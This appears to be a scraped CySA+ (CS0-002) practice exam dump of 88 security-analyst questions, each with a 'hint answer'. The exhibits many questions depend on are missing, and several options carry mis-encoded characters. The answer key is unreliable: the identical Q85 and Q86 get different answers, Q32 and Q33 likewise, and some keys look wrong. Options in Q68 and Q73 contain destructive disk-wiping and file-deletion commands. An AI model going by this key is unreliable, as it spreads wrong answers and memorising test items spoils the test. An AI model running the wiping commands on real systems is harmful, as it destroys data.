CS0-002 Topic 1
Q1.A security analyst is correlating, ranking, and enriching raw data into a report that will be interpreted by humans or machines to draw conclusions and create actionable recommendations. Which of the following steps in the intelligence cycle is the security analyst performing?
A. Analysis and production
B. Processing and exploitation
C. Dissemination and evaluation
D. Data collection
E. Planning and direction
Hint answer: A
Q2.A financial organization has offices located globally. Per the organization’s policies and procedures, all executives who conduct business overseas must have their mobile devices checked for malicious software or evidence of tampering upon their return. The information security department oversees this process, and no executive has had a device compromised. The Chief Information Security Officer wants to implement an additional safeguard to protect the organization’s data.
Which of the following controls would work BEST to protect the privacy of the data if a device is stolen?
A. Implement a mobile device wiping solution for use if a device is lost or stolen.
B. Install a DLP solution to track data flow.
C. Install an encryption solution on all mobile devices.
D. Train employees to report a lost or stolen laptop to the security department immediately.
Hint answer: C
Q3.During routine monitoring, a security analyst identified the following enterprise network traffic:
Packet capture output:
Which of the following BEST describes what the security analyst observed?
A. 66.187.224.210 set up a DNS hijack with 192.168.12.21.
B. 192.168.12.21 made a TCP connection to 66.187.224.210.
C. 192.168.12.21 made a TCP connection to 209.132.177.50.
D. 209.132.177.50 set up a TCP reset attack to 192.168.12.21.
Hint answer: C
Q4.A security analyst is performing a Diamond Model analysis of an incident the company had last quarter. A potential benefit of this activity is that it can identify:
A. detection and prevention capabilities to improve.
B. which systems were exploited more frequently.
C. possible evidence that is missing during forensic analysis.
D. which analysts require more training.
E. the time spent by analysts on each of the incidents.
Hint answer: A
Q5.A security analyst discovers suspicious host activity while performing monitoring activities. The analyst pulls a packet capture for the activity and sees the following:
Follow TCP stream:
Which of the following describes what has occurred?
A. The host attempted to download an application from utoftor.com.
B. The host downloaded an application from utoftor.com.
C. The host attempted to make a secure connection to utoftor.com.
D. The host rejected the connection from utoftor.com.
Hint answer: A
Q6.An organization has the following policy statements:
✑ All emails entering or leaving the organization will be subject to inspection for malware, policy violations, and unauthorized content.
✑ All network activity will be logged and monitored.
✑ Confidential data will be tagged and tracked.
✑ Confidential data must never be transmitted in an unencrypted form.
✑ Confidential data must never be stored on an unencrypted mobile device.
Which of the following is the organization enforcing?
A. Acceptable use policy
B. Data privacy policy
C. Encryption policy
D. Data management policy
Hint answer: C
Q7.An information security analyst discovered a virtual machine server was compromised by an attacker. Which of the following should be the FIRST steps to confirm and respond to the incident? (Choose two.)
A. Pause the virtual machine.
B. Shut down the virtual machine.
C. Take a snapshot of the virtual machine.
D. Remove the NIC from the virtual machine.
E. Review host hypervisor log of the virtual machine.
F. Execute a migration of the virtual machine.
Hint answer: A
C
Q8.An information security analyst discovered a virtual machine server was compromised by an attacker. Which of the following should be the FIRST step to confirm and respond to the incident?
A. Pause the virtual machine,
B. Shut down the virtual machine.
C. Take a snapshot of the virtual machine.
D. Remove the NIC from the virtual machine.
Hint answer: A
Q9.A security analyst received a SIEM alert regarding high levels of memory consumption for a critical system. After several attempts to remediate the issue, the system went down. A root cause analysis revealed a bad actor forced the application to not reclaim memory. This caused the system to be depleted of resources. Which of the following BEST describes this attack?
A. Injection attack
B. Memory corruption
C. Denial of service
D. Array attack
Hint answer: C
Q10.A company’s legal and accounting teams have decided it would be more cost-effective to offload the risks of data storage to a third party. The IT management team has decided to implement a cloud model and has asked the security team for recommendations. Which of the following will allow all data to be kept on the third-party network?
A. VDI
B. SaaS
C. CASB
D. FaaS
Hint answer: B
Q11.An analyst receives artifacts from a recent intrusion and is able to pull a domain, IP address, email address, and software version. Which of the following points of the Diamond Model of Intrusion Analysis does this intelligence represent?
A. Infrastructure
B. Capabilities
C. Adversary
D. Victims
Hint answer: A
Q12.A company stores all of its data in the cloud. All company-owned laptops are currently unmanaged, and all users have administrative rights. The security team is having difficulty identifying a way to secure the environment. Which of the following would be the BEST method to protect the company’s data?
A. Implement UEM on all systems and deploy security software.
B. Implement DLP on all workstations and block company data from being sent outside the company.
C. Implement a CASB and prevent certain types of data from being downloaded to a workstation.
D. Implement centralized monitoring and logging for all company systems.
Hint answer: C
Q13.A company’s domain has been spoofed in numerous phishing campaigns. An analyst needs to determine why the company is a victim of domain spoofing, despite having a DMARC record that should tell mailbox providers to ignore any email that fails DMARC. Upon review of the record, the analyst finds the following: v=DMARC1; p=none; fo=0; rua=mailto:security@company.com; ruf=mailto:security@company.com; adkim=r; rf=afrf; ri=86400;
Which of the following BEST explains the reason why the company’s requirements are not being processed correctly by mailbox providers?
A. The DMARC record’s DKIM alignment tag is incorrectly configured.
B. The DMARC record’s policy tag is incorrectly configured.
C. The DMARC record does not have an SPF alignment tag.
D. The DMARC record’s version tag is set to DMARC1 instead of the current version, which is DMARC3.
Hint answer: B
Q14.Massivelog.log has grown to 40GB on a Windows server. At this size, local tools are unable to read the file, and it cannot be moved off the virtual server where it is located. Which of the following lines of PowerShell script will allow a user to extract the last 10,000 lines of the log for review?
A. tail -10000 Massivelog.log > extract.txt
B. info tail n -10000 Massivelog.log | extract.txt;
C. get content ‘./Massivelog.log’ -Last 10000 | extract.txt
D. get-content ‘./Massivelog.log’ -Last 10000 > extract.txt;
Hint answer: D
Q15.A security analyst is reviewing the following Internet usage trend report:
Which of the following usernames should the security analyst investigate further?
A. User 1
B. User 2
C. User 3
D. User 4
Hint answer: B
Q16.The incident response team is working with a third-party forensic specialist to investigate the root cause of a recent intrusion. An analyst was asked to submit sensitive network design details for review. The forensic specialist recommended electronic delivery for efficiency, but email was not an approved communication channel to send network details. Which of the following BEST explains the importance of using a secure method of communication during incident response?
A. To prevent adversaries from intercepting response and recovery details
B. To ensure intellectual property remains on company servers
C. To have a backup plan in case email access is disabled
D. To ensure the management team has access to all the details that are being exchanged
Hint answer: B
Q17.Which of the following allows Secure Boot to be enabled?
A. eFuse
B. UEFI
C. HSM
D. PAM
Hint answer: B
Q18.A newly appointed Chief Information Security Officer has completed a risk assessment review of the organization and wants to reduce the numerous risks that were identified. Which of the following will provide a trend of risk mitigation?
A. Planning
B. Continuous monitoring
C. Risk response
D. Risk analysis
E. Oversight
Hint answer: B
Q19.A developer downloaded and attempted to install a file transfer application in which the installation package is bundled with adware. The next-generation antivirus software prevented the file from executing, but it did not remove the file from the device. Over the next few days, more developers tried to download and execute the offending file. Which of the following changes should be made to the security tools to BEST remedy the issue?
A. Blacklist the hash in the next-generation antivirus system.
B. Manually delete the file from each of the workstations.
C. Remove administrative rights from all developer workstations.
D. Block the download of the file via the web proxy.
Hint answer: D
Q20.Which of the following is MOST important when developing a threat hunting program?
A. Understanding penetration testing techniques
B. Understanding how to build correlation rules within a SIEM
C. Understanding security software technologies
D. Understanding assets and categories of assets
Hint answer: D
Q21.The help desk is having difficulty keeping up with all onboarding and offboarding requests. Managers often submit requests for new users at the last minute, causing the help desk to scramble to create accounts across many different interconnected systems. Which of the following solutions would work BEST to assist the help desk with the onboarding and offboarding process while protecting the company’s assets?
A. MFA
B. CASB
C. SSO
D. RBAC
Hint answer: D
Q22.A security analyst needs to provide the development team with secure connectivity from the corporate network to a three-tier cloud environment. The developers require access to servers in all three tiers in order to perform various configuration tasks. Which of the following technologies should the analyst implement to provide secure transport?
A. CASB
B. VPC
C. Federation
D. VPN
Hint answer: D
Q23.A company has a cluster of web servers that is critical to the business. A systems administrator installed a utility to troubleshoot an issue, and the utility caused the entire cluster to go offline. Which of the following solutions would work BEST prevent to this from happening again?
A. Change management
B. Application whitelisting
C. Asset management
D. Privilege management
Hint answer: A
Q24.A company’s Chief Information Officer wants to use a CASB solution to ensure policies are being met during cloud access. Due to the nature of the company’s business and risk appetite, the management team elected to not store financial information in the cloud. A security analyst needs to recommend a solution to mitigate the threat of financial data leakage into the cloud. Which of the following should the analyst recommend?
A. Utilize the CASB to enforce DLP data-at-rest protection for financial information that is stored on premises.
B. Do not utilize the CASB solution for this purpose, but add DLP on premises for data in motion.
C. Utilize the CASB to enforce DLP data-in-motion protection for financial information moving to the cloud.
D. Do not utilize the CASB solution for this purpose, but add DLP on premises for data at rest.
Hint answer: C
Q25.An employee was found to have performed fraudulent activities. The employee was dismissed, and the employee’s laptop was sent to the IT service desk to undergo a data sanitization procedure. However, the security analyst responsible for the investigation wants to avoid data sanitization. Which of the following can the security analyst use to justify the request?
A. GDPR
B. Data correlation procedure
C. Evidence retention
D. Data retention
Hint answer: C
Q26.During the forensic analysis of a compromised machine, a security analyst discovers some binaries that are exhibiting abnormal behaviors. After extracting the strings, the analyst finds unexpected content. Which of the following is the NEXT step the analyst should take?
A. Validate the binaries’ hashes from a trusted source.
B. Use file integrity monitoring to validate the digital signature.
C. Run an antivirus against the binaries to check for malware.
D. Only allow whitelisted binaries to execute.
Hint answer: C
Q27.A security analyst is investigating a compromised Linux server. The analyst issues the ps command and receives the following output:
Which of the following commands should the administrator run NEXT to further analyze the compromised system?
A. strace /proc/1301
B. rpm -V openssh-server
C. /bin/ls -1 /proc/1301/exe
D. kill -9 1301
Hint answer: C
Q28.SIMULATION –
Approximately 100 employees at your company have received a phishing email. As a security analyst, you have been tasked with handling this situation.
INSTRUCTIONS –
Review the information provided and determine the following:
1. How many employees clicked on the link in the phishing email?
2. On how many workstations was the malware installed?
3. What is the executable file name of the malware?
If at any time you would like to bring back the initial state of the simulation, please click the Reset All button.
Hint answer:
Q29.A company’s application development has been outsourced to a third-party development team. Based on the SLA, the development team must follow industry best practices for secure coding. Which of the following is the BEST way to verify this agreement?
A. Input validation
B. Security regression testing
C. Application fuzzing
D. User acceptance testing
E. Stress testing
Hint answer: C
Q30.Company A is in the process of merging with Company B. As part of the merger, connectivity between the ERP systems must be established so pertinent financial information can be shared between the two entities. Which of the following will establish a more automated approach to secure data transfers between the two entities?
A. Set up an FTP server that both companies can access and export the required financial data to a folder.
B. Set up a VPN between Company A and Company B, granting access only to the ERPs within the connection.
C. Set up a PKI between Company A and Company B and intermediate shared certificates between the two entities.
D. Create static NATs on each entity’s firewalls that map to the ERR systems and use native ERP authentication to allow access.
Hint answer: B
Q31.An analyst is reviewing the following output as part of an incident:
Which of the following is MOST likely happening?
A. The hosts are part of a reflective denial-of-service attack
B. Information is leaking from the memory of host 10.20.30.40
C. Sensitive data is being exfiltrated by host 192.168.1.10
D. Host 192.168.1.10 is performing firewall port knocking
Hint answer: B
Q32.During a review of recent network traffic, an analyst realizes the team has seen this same traffic multiple times in the past three weeks, and it resulted in confirmed malware activity. The analyst also notes there is no other alert in place for this traffic. After resolving the security incident, which of the following would be the
BEST action for the analyst to take to increase the chance of detecting this traffic in the future?
A. Share details of the security incident with the organization’s human resources management team.
B. Note the security incident so other analysts are aware the traffic is malicious.
C. Communicate the security incident to the threat team for further review and analysis.
D. Report the security incident to a manager for inclusion in the daily report.
Hint answer: B
Q33.During a review of recent network traffic, an analyst realizes the team has seen this same traffic multiple times in the past three weeks, and it resulted in confirmed malware activity. The analyst also notes there is no other alert in place for this traffic. After resolving the security incident, which of the following would be the BEST action for the analyst to take to increase the chance of detecting this traffic in the future?
A. Share details of the security incident with the organization’s human resources management team.
B. Note the security incident to junior analysts so they are aware of the traffic.
C. Communicate the security incident to the threat team for further review and analysis.
D. Report the security incident for inclusion in the daily report.
Hint answer: C
Q34.Employees of a large financial company are continuously being infected by strands of malware that are not detected by EDR tools. Which of the following is the BEST security control to implement to reduce corporate risk while allowing employees to exchange files at client sites?
A. MFA on the workstations
B. Additional host firewall rules
C. VDI environment
D. Hard drive encryption
E. Network access control
F. Network segmentation
Hint answer: C
Q35.An organization is experiencing security incidents in which a systems administrator is creating unauthorized user accounts. A security analyst has created a script to snapshot the system configuration each day. Following is one of the scripts: cat /etc/passwd > daily_$(date +”%m_%d_%Y”)
This script has been running successfully every day. Which of the following commands would provide the analyst with additional useful information relevant to the above script?
A. diff daily_11_03_2019 daily_11_04_2019
B. ps ג€”ef | grep admin > daily_process_$(date +%m_%d_%Y”)
C. more /etc/passwd > daily_$(date +%m_%d_%Y_%H:%M:%S”)
D. la ג€”lai /usr/sbin > daily_applications
Hint answer: B
Q36.During an incident response procedure, a security analyst collects a hard drive to analyze a possible vector of compromise. There is a Linux swap partition on the hard drive that needs to be checked. Which of the following should the analyst use to extract human-readable content from the partition?
A. strings
B. head
C. fsstat
D. dd
Hint answer: a
Q37.Which of the following BEST describes how logging and monitoring work when entering into a public cloud relationship with a service provider?
A. Logging and monitoring are not needed in a public cloud environment.
B. Logging and monitoring are done by the data owners.
C. Logging and monitoring duties are specified in the SLA and contract.
D. Logging and monitoring are done by the service provider.
Hint answer: C
Q38.A product security analyst has been assigned to evaluate and validate a new product’s security capabilities. Part of the evaluation involves reviewing design changes at specific intervals for security deficiencies, recommending changes, and checking for changes at the next checkpoint. Which of the following BEST describes the activity being conducted?
A. User acceptance testing
B. Stress testing
C. Code review
D. Security regression testing
Hint answer: C
Q39.Which of the following BEST explains the function of a managerial control?
A. To scope the security planning, program development, and maintenance of the security life cycle
B. To guide the development of training, education, security awareness programs, and system maintenance
C. To implement data classification, risk assessments, security control reviews, and contingency planning
D. To ensure tactical design, selection of technology to protect data, logical access reviews, and the implementation of audit trails
Hint answer: C
Q40.A user’s computer has been running slowly when the user tries to access web pages. A security analyst runs the command netstat -aon from the command line and receives the following output:
Which of the following lines indicates the computer may be compromised?
A. Line 1
B. Line 2
C. Line 3
D. Line 4
E. Line 5
F. Line 6
Hint answer: C
Q41.Which of the following is MOST closely related to the concept of privacy?
A. The implementation of confidentiality, integrity, and availability
B. A system’s ability to protect the confidentiality of sensitive information
C. An individual’s control over personal information
D. A policy implementing strong identity management processes
Hint answer: c
Q42.A company’s blocklist has outgrown the current technologies in place. The ACLs are at maximum, and the IPS signatures only allow a certain amount of space for domains to be added, creating the need for multiple signatures. Which of the following configuration changes to the existing controls would be the MOST appropriate to improve performance?
A. Implement a host-file-based solution that will use a list of all domains to deny for all machines on the network.
B. Create an IDS for the current blocklist to determine which domains are showing activity and may need to be removed.
C. Review the current blocklist and prioritize it based on the level of threat severity. Add the domains with the highest severity to the blocklist and remove the lower-severity threats from it.
D. Review the current blocklist to determine which domains can be removed from the list and then update the ACLs and IPS signatures.
Hint answer: C
Q43.A security analyst found the following entry in a server log:
The analyst executed netstat and received the following output:
Which of the following lines in the output confirms this was successfully executed by the server?
A. 1
B. 2
C. 3
D. 4
E. 5
F. 6
G. 7
Hint answer: E
Q44.A security administrator needs to provide access from partners to an isolated laboratory network inside an organization that meets the following requirements:
* The partners’ PCs must not connect directly to the laboratory network
* The tools the partners need to access while on the laboratory network must be available to all partners
* The partners must be able to run analyses on the laboratory network, which may take hours to complete
Which of the following capabilities will MOST likely meet the security objectives of the request?
A. Deployment of a jump box to allow access to the laboratory network and use of VDI in persistent mode to provide the necessary tools for analysis
B. Deployment of a firewall to allow access to the laboratory network and use of VDI in non-persistent mode to provide the necessary tools for analysis
C. Deployment of a firewall to allow access to the laboratory network and use of VDI in persistent mode to provide the necessary tools for analysis
D. Deployment of a jump box to allow access to the laboratory network and use of VDI in non-persistent mode to provide the necessary tools for analysis
Hint answer: A
Q45.After an incident involving a phishing email, a security analyst reviews the following email access log:
Based on this information, which of the following accounts was MOST likely compromised?
A. CARLB
B. CINDYP
C. GILLIANO
D. ANDREAD
E. LAURAB
Hint answer: D
Q46.A company frequently experiences issues with credential stuffing attacks. Which of the following is the BEST control to help prevent these attacks from being successful?
A. SIEM
B. IDS
C. MFA
D. TLS
Hint answer: C
Q47.During an investigation, a security analyst determines suspicious activity occurred during the night shift over the weekend. Further investigation reveals the activity was initiated from an internal IP going to an external website. Which of the following would be the MOST appropriate recommendation to prevent similar activity from happening in the future?
A. An IPS signature modification for the specific IP addresses
B. An IDS signature modification for the specific IP addresses
C. A firewall rule that will block port 80 traffic
D. Implement a web proxy to restrict malicious web content
Hint answer: D
Q48.A security analyst is researching ways to improve the security of a company’s email system to mitigate emails that are impersonating company executives. Which of the following would be BEST for the analyst to configure to achieve this objective?
A. A TXT record on the name server for SPF
B. DNSSEC keys to secure replication
C. Domain Keys Identified Mail
D. A sandbox to check incoming mail
Hint answer: C
Q49.A security analyst identified one server that was compromised and used as a data mining machine, and a clone of the hard drive that was created. Which of the following will MOST likely provide information about when and how the machine was compromised and where the malware is located?
A. System timeline reconstruction
B. System registry extraction
C. Data carving
D. Volatile memory analysis
Hint answer: A
Q50.A business recently acquired a software company. The software company’s security posture is unknown. However, based on an initial assessment, there are limited security controls. No significant security monitoring exists. Which of the following is the NEXT step that should be completed to obtain information about the software company’s security posture?
A. Develop an asset inventory to determine the systems within the software company.
B. Review relevant network drawings, diagrams, and documentation.
C. Perform penetration tests against the software company’s internal and external networks.
D. Baseline the software company’s network to determine the ports and protocols in use.
Hint answer: A
Q51.A security analyst identified some potentially malicious processes after capturing the contents of memory from a machine during incident response. Which of the following procedures is the NEXT step for further investigation?
A. Data carving
B. Timeline construction
C. File cloning
D. Reverse engineering
Hint answer: D
Q52.A company recently experienced a breach of sensitive information that affects customers across multiple geographical regions. Which of the following roles would be BEST suited to determine the breach notification requirements?
A. Legal counsel
B. Chief Security Officer
C. Human resources
D. Law enforcement
Hint answer: A
Q53.After a remote command execution incident occurred on a web server, a security analyst found the following piece of code in an XML file:
Which of the following is the BEST solution to mitigate this type of attack?
A. Implement a better level of user input filters and content sanitization.
B. Properly configure XML handlers so they do not process &ent parameters coming from user inputs.
C. Use parameterized queries to avoid user inputs from being processed by the server.
D. Escape user inputs using character encoding conjoined with whitelisting.
Hint answer: B
Q54.A security analyst is reviewing a vulnerability scan report and notes the following finding:
As part of the detection and analysis procedures, which of the following should the analyst do NEXT?
A. Patch or reimage the device to complete the recovery.
B. Restart the antiviruses running processes.
C. Isolate the host from the network to prevent exposure.
D. Confirm the workstation’s signatures against the most current signatures.
Hint answer: C
Q55.Which of the following is the BEST security practice to prevent ActiveX controls from running malicious code on a user’s web application?
A. Deploying HIPS to block malicious ActiveX code
B. Installing network-based IPS to block malicious ActiveX code
C. Adjusting the web-browser settings to block ActiveX controls
D. Configuring a firewall to block traffic on ports that use ActiveX controls
Hint answer: C
Q56.While monitoring the information security notification mailbox, a security analyst notices several emails were reported as spam. Which of the following should the analyst do FIRST?
A. Block the sender in the email gateway.
B. Delete the email from the company’s email servers.
C. Ask the sender to stop sending messages.
D. Review the message in a secure environment.
Hint answer: D
Q57.In SIEM software, a security analyst detected some changes to hash signatures from monitored files during the night followed by SMB brute-force attacks against the file servers. Based on this behavior, which of the following actions should be taken FIRST to prevent a more serious compromise?
A. Fully segregate the affected servers physically in a network segment, apart from the production network.
B. Collect the network traffic during the day to understand if the same activity is also occurring during business hours.
C. Check the hash signatures, comparing them with malware databases to verify if the files are infected.
D. Collect all the files that have changed and compare them with the previous baseline.
Hint answer: C
Q58.The security team decides to meet informally to discuss and test their response plan for potential security breaches and emergency situations. Which of the following types of training will the security team perform?
A. Tabletop exercise
B. Red-team attack
C. System assessment implementation
D. Blue-team training
E. White-team engagement
Hint answer: A
Q59.A security analyst is conducting a post-incident log analysis to determine which indicators can be used to detect further occurrences of a data exfiltration incident. The analyst determines backups were not performed during this time and reviews the following:
Which of the following should the analyst review to find out how the data was exfiltrated?
A. Monday’s logs
B. Tuesday’s logs
C. Wednesday’s logs
D. Thursday’s logs
Hint answer: D
Q60.In response to an audit finding, a company’s Chief Information Officer (CIO) instructed the security department to increase the security posture of the vulnerability management program. Currently, the company’s vulnerability management program has the following attributes:
✑ It is unauthenticated.
✑ It is at the minimum interval specified by the audit framework.
✑ It only scans well-known ports.
Which of the following would BEST increase the security posture of the vulnerability management program?
A. Expand the ports being scanned to include all ports. Increase the scan interval to a number the business will accept without causing service interruption. Enable authentication and perform credentialed scans.
B. Expand the ports being scanned to include all ports. Keep the scan interval at its current level. Enable authentication and perform credentialed scans.
C. Expand the ports being scanned to include all ports. Increase the scan interval to a number the business will accept without causing service interruption. Continue unauthenticated scanning.
D. Continue scanning the well-known ports. Increase the scan interval to a number the business will accept without causing service interruption. Enable authentication and perform credentialed scans.
Hint answer: B
Q61.A company is experiencing a malware attack within its network. A security engineer notices many of the impacted assets are connecting outbound to a number of remote destinations and exfiltrating data. The security engineer also sees that deployed, up-to-date antivirus signatures are ineffective. Which of the following is the BEST approach to prevent any impact to the company from similar attacks in the future?
A. IDS signatures
B. Data loss prevention
C. Port security
D. Sinkholing
Hint answer: B
Q62.An IT security analyst has received an email alert regarding a vulnerability within the new fleet of vehicles the company recently purchased. Which of the following attack vectors is the vulnerability MOST likely targeting?
A. SCADA
B. CAN bus
C. Modbus
D. IoT
Hint answer: B
Q63.Which of the following BEST explains the function of a managerial control?
A. To help design and implement the security planning, program development, and maintenance of the security life cycle
B. To guide the development of training, education, security awareness programs, and system maintenance
C. To create data classification, risk assessments, security control reviews, and contingency planning
D. To ensure tactical design, selection of technology to protect data, logical access reviews, and the implementation of audit trails
Hint answer: C
Q64.A user receives a potentially malicious attachment that contains spelling errors and a PDF document. A security analyst reviews the email and decides to download the attachment to a Linux sandbox for review. Which of the following commands would MOST likely indicate if the email is malicious?
A. sha256sum ~/Desktop/file.pdf
B. file ~/Desktop/file.pdf
C. strings ~/Desktop/file.pdf | grep –i “
D. cat < ~/Desktop/file.pdf | grep –i .exe
Hint answer: C
Q65.In web application scanning, static analysis refers to scanning:
A. the system for vulnerabilities before installing the application
B. the compiled code of the application to detect possible issues.
C. an application that is installed and active on a system.
D. an application that is installed on a system that is assigned a static IP.
Hint answer: B
Q66.An organization's Chief Information Security Officer has asked department leaders to coordinate on communication plans that can be enacted in response to different cybersecurity incident triggers. Which of the following is a benefit of having these communication plans?
A. They can help to prevent the inadvertent release of damaging information outside the organization
B. They can help to limit the spread of worms by coordinating with help desk personnel earlier in the recovery phase.
C. They can quickly inform the public relations team to begin coordinating with the media as soon as a breach is detected
D. They can help to keep the organization’s senior leadership informed about the status of patching during the recovery phase
Hint answer: A
Q67.An organization prohibits users from logging in to the administrator account. If a user requires elevated permissions, the user's account should be part of an administrator group, and the user should escalate permission only as needed and on a temporary basis. The organization has the following reporting priorities when reviewing system activity:
✑ Successful administrator login reporting priority `" high
✑ Failed administrator login reporting priority `" medium
✑ Failed temporary elevated permissions `" low
✑ Successful temporary elevated permissions `" non-reportable
A security analyst is reviewing server syslogs and sees the following:
Which of the following events is the HIGHEST reporting priority?
A. <100>2 2020-01-10T20:36:01.010Z financeserver sudo 201 32001 – BOM ‘sudo vi users.txt’ success
B. <100>2 2020-01-10T21:18:34.002Z adminserver sudo 201 32001 – BOM ‘sudo more /etc/passwords’ success
C. <100>2 2020-01-10T19:33:48.002Z webserver su 201 32001 – BOM ‘su’ success
D. <100>2 2020-01-10T21:53:11.002Z financeserver su 201 32001 – BOM ‘su vi syslog.conf failed for joe
Hint answer: B
Q68.Some hard disks need to be taken as evidence for further analysis during an incident response. Which of the following procedures must be completed FIRST for this type of evidence acquisition?
A. Extract the hard drives from the compromised machines and then plug them into a forensics machine to apply encryption over the stored data to protect it from nonauthorized access.
B. Build the chain-of-custody document, noting the media model, serial number, size, vendor, date, and time of acquisition.
C. Perform a disk sanitization using the command #dd if=/dev/zero of=/dev/sdc bs=1M over the media that will receive a copy of the collected data.
D. Execute the command #dd if-/dev/sda of=/dev/sdc bs=512 to clone the evidence data to external media to prevent any further change.
Hint answer: B
Q69.Which of the following is the BEST way to gather patch information on a specific server?
A. Event Viewer
B. Custom script
C. SCAP software
D. CI/CD
Hint answer: C
Q70.A company employee downloads an application from the internet. After the installation, the employee begins experiencing noticeable performance issues, and files are appearing on the desktop:
Which of the following processes will the security analyst identify as the MOST likely indicator of system compromise given the processes running in Task Manager?
A. Chrome.exe
B. Word.exe
C. Explorer.exe
D. mstsc.exe
E. taskmgr.exe
Hint answer: D
Q71.Which of the following can detect vulnerable third-party libraries before code deployment?
A. Impact analysis
B. Dynamic analysis
C. Static analysis
D. Protocol analysis
Hint answer: C
Q72.A security analyst found an old version of OpenSSH running on a DMZ server and determined the following piece of code could have led to a command execution through an integer overflow:
Which of the following controls must be in place to prevent this vulnerability?
A. Convert all integer numbers in strings to handle the memory buffer correctly.
B. Implement float numbers instead of integers to prevent integer overflows.
C. Use built-in functions from libraries to check and handle long numbers properly.
D. Sanitize user inputs, avoiding small numbers that cannot be handled in the memory.
Hint answer: C
Q73.A security analyst has received reports of very slow, intermittent access to a public-facing corporate server. Suspecting the system may be compromised, the analyst runs the following commands:
Based on the output from the above commands, which of the following should the analyst do NEXT to further the investigation?
A. Run crontab -r; rm -rf /tmp/.t to remove and disable the malware on the system.
B. Examine the server logs for further indicators of compromise of a web application.
C. Run kill -9 1325 to bring the load average down so the server is usable again.
D. Perform a binary analysis on the /tmp/.t/t file, as it is likely to be a rogue SSHD server.
Hint answer: B
Q74.Which of the following BEST explains the function of trusted firmware updates as they relate to hardware assurance?
A. Trusted firmware updates provide organizations with development, compilation, remote access, and customization for embedded devices.
B. Trusted firmware updates provide organizations with security specifications, open-source libraries, and custom tools for embedded devices.
C. Trusted firmware updates provide organizations with remote code execution, distribution, maintenance, and extended warranties for embedded devices.
D. Trusted firmware updates provide organizations with secure code signing, distribution, installation, and attestation for embedded devices.
Hint answer: D
Q75.A security analyst scanned an internal company subnet and discovered a host with the following Nmap output.
Based on the output of this Nmap scan, which of the following should the analyst investigate FIRST?
A. Port 22
B. Port 135
C. Port 445
D. Port 3389
Hint answer: A
Q76.A security analyst needs to identify possible threats to a complex system a client is developing. Which of the following methodologies would BEST address this task?
A. Spoofing, Tampering, Repudiation, Information disclosure, Denial of service, Elevation of privileges (STRIDE)
B. Software Assurance Maturity Model (SAMM)
C. Open Web Application Security Project (OWASP)
D. Open Source Security Information Management (OSSIM)
Hint answer: A
Q77.An organization has several systems that require specific logons. Over the past few months, the security analyst has noticed numerous failed logon attempts followed by password resets. Which of the following should the analyst do to reduce the occurrence of legitimate failed logons and password resets?
A. Use SSO across all applications
B. Perform a manual privilege review
C. Adjust the current monitoring and logging rules
D. Implement multi factor authentication
Hint answer: A
Q78.A large software company wants to move its source control and deployment pipelines into a cloud-computing environment. Due to the nature of the business, management determines the recovery time objective needs to be within one hour. Which of the following strategies would put the company in the BEST position to achieve the desired recovery time?
A. Establish an alternate site with active replication to other regions
B. Configure a duplicate environment in the same region and load balance between both instances
C. Set up every cloud component with duplicated copies and auto-scaling turned on
D. Create a duplicate copy on premises that can be used for failover in a disaster situation
Hint answer: A
Q79.Which of the following incident response components can identify who is the liaison between multiple lines of business and the public?
A. Red-team analysis
B. Escalation process and procedures
C. Triage and analysis
D. Communications plan
Hint answer: D
Q80.Which of the following sources will provide the MOST relevant threat intelligence data to the security team of a dental care network?
A. H-ISAC
B. Dental forums
C. Open threat exchange
D. Dark web chatter
Hint answer: A
Q81.As part of an intelligence feed, a security analyst receives a report from a third-party trusted source. Within the report are several domains and reputational information that suggest the company’s employees may be targeted for a phishing campaign. Which of the following configuration changes would be the MOST appropriate for intelligence gathering?
A. Update the whitelist.
B. Develop a malware signature.
C. Sinkhole the domains.
D. Update the blacklist.
Hint answer: C
Q82.A security analyst is running a tool against an executable of an unknown source. The input supplied by the tool to the executable program and the output from the executable are shown below:
Which of the following should the analyst report after viewing this information?
A. A dynamic library that is needed by the executable is missing.
B. Input can be crafted to trigger an injection attack in the executable.
C. The tool caused a buffer overflow in the executable’s memory.
D. The executable attempted to execute a malicious command.
Hint answer: B
Q83.An organization recently discovered that spreadsheet files containing sensitive financial data were improperly stored on a web server. The management team wants to find out if any of these files were downloaded by public users accessing the server. The results should be written to a text file and should include the date, time, and IP address associated with any spreadsheet downloads. The web server’s log file is named webserver.log, and the report file name should be accessreport.txt. Following is a sample of the web server’s log file:
Which of the following commands should be run if an analyst only wants to include entries in which a spreadsheet was successfully downloaded?
A. more webserver.log | grep *.xls > accessreport.txt
B. more webserver.log > grep ג€*xlsג€ | egrep ג€”E ‘success’ > accessreport.txt
C. more webserver.log | grep ג€”E ג€return=200 | xlsג€ > accessreport.txt
D. more webserver.log | grep ג€”A *.xls < accessreport.txt
Hint answer: C
Q84.A software development team asked a security analyst to review some code for security vulnerabilities. Which of the following would BEST assist the security analyst while performing this task?
A. Static analysis
B. Dynamic analysis
C. Regression testing
D. User acceptance testing
Hint answer: A
Q85.After detecting possible malicious external scanning, an internal vulnerability scan was performed, and a critical server was found with an outdated version of
JBoss. A legacy application that is running depends on that version of JBoss. Which of the following actions should be taken FIRST to prevent server compromise and business disruption at the same time?
A. Make a backup of the server and update the JBoss server that is running on it.
B. Contact the vendor for the legacy application and request an updated version.
C. Create a proper DMZ for outdated components and segregate the JBoss server.
D. Apply virtualization over the server, using the new platform to provide the JBoss service for the legacy application as an external service.
Hint answer: C
Q86.After detecting possible malicious external scanning, an internal vulnerability scan was performed, and a critical server was found with an outdated version of
JBoss. A legacy application that is running depends on that version of JBoss. Which of the following actions should be taken FIRST to prevent server compromise and business disruption at the same time?
A. Make a backup of the server and update the JBoss server that is running on it.
B. Contact the vendor for the legacy application and request an updated version.
C. Create a proper DMZ for outdated components and segregate the JBoss server.
D. Apply virtualization over the server, using the new platform to provide the JBoss service for the legacy application as an external service.
Hint answer: B
Q87.The management team assigned the following values to an inadvertent breach of privacy regulations during the original risk assessment:
✑ Probability = 25%
✑ Magnitude = $1,015 per record
✑ Total records = 10,000
Two breaches occurred during the fiscal year. The first compromised 35 records, and the second compromised 65 records. Which of the following is the value of the records that were compromised?
A. $10,150
B. $25,375
C. $101,500
D. $2,537,500
Hint answer: C
Q88.Which of the following is a difference between SOAR and SCAP?
A. SOAR can be executed faster and with fewer false positives than SCAP because of advanced heuristics.
B. SOAR has a wider breadth of capability using orchestration and automation, while SCAP is more limited in scope.
C. SOAR is less expensive because process and vulnerability remediation is more automated than what SCAP does.
D. SOAR eliminates the need for people to perform remediation, while SCAP relies heavily on security analysts.
Hint answer: B
